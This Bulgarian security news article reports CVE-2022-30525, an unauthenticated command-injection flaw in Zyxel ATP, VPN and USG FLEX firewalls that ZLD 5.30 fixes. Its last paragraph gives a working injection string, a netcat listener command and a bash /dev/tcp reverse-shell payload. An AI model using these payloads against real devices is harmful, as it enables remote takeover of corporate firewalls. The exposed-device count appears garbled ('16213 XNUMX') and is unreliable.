Уязвимост в защитните стени на Zyxel, която позволява изпълнение на код без удостоверяване

Критична уязвимост (CVE-2022-30525) е идентифицирана в устройствата Zyxel от сериите ATP, VPN и USG FLEX, предназначени да организират работата на защитни стени, IDS и VPN в предприятията, което позволява на външен атакуващ да изпълни код на устройство без потребителски права без удостоверяване. За да извърши атака, нападателят трябва да може да изпраща заявки до устройството, използвайки HTTP/HTTPS протокола. Zyxel поправи уязвимостта в актуализацията на фърмуера ZLD 5.30. Според услугата Shodan в момента в глобалната мрежа има 16213 XNUMX потенциално уязвими устройства, които приемат заявки чрез HTTP/HTTPS.

Операцията се извършва чрез изпращане на специално проектирани команди към уеб манипулатора /ztp/cgi-bin/handler, достъпен без удостоверяване. Проблемът е причинен от липсата на правилно почистване на параметрите на заявката при изпълнение на команди в системата с помощта на извикването os.system, използвано в библиотеката lib_wan_settings.py и изпълнено при обработка на операцията setWanPortSt.

Например, нападателят може да предаде низа „; ping 192.168.1.210;" което ще доведе до изпълнение на командата “ping 192.168.1.210” в системата. За да получите достъп до командната обвивка, можете да стартирате “nc -lvnp 1270” на вашата система и след това да инициирате обратна връзка, като изпратите заявка до устройството с '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Източник: opennet.ru